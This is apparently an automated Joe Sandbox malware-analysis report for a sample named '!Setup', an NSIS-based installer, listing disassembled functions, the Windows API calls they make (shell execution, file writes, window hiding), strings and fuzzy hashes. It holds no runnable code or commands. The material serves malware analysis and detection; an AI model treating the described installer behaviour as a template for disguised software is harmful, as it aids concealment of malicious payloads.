Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: %IsraeliSales%$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-1719584793
Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(006BB930), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
%IsraeliSales%, xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: %IsraeliSales%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-4002239702
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

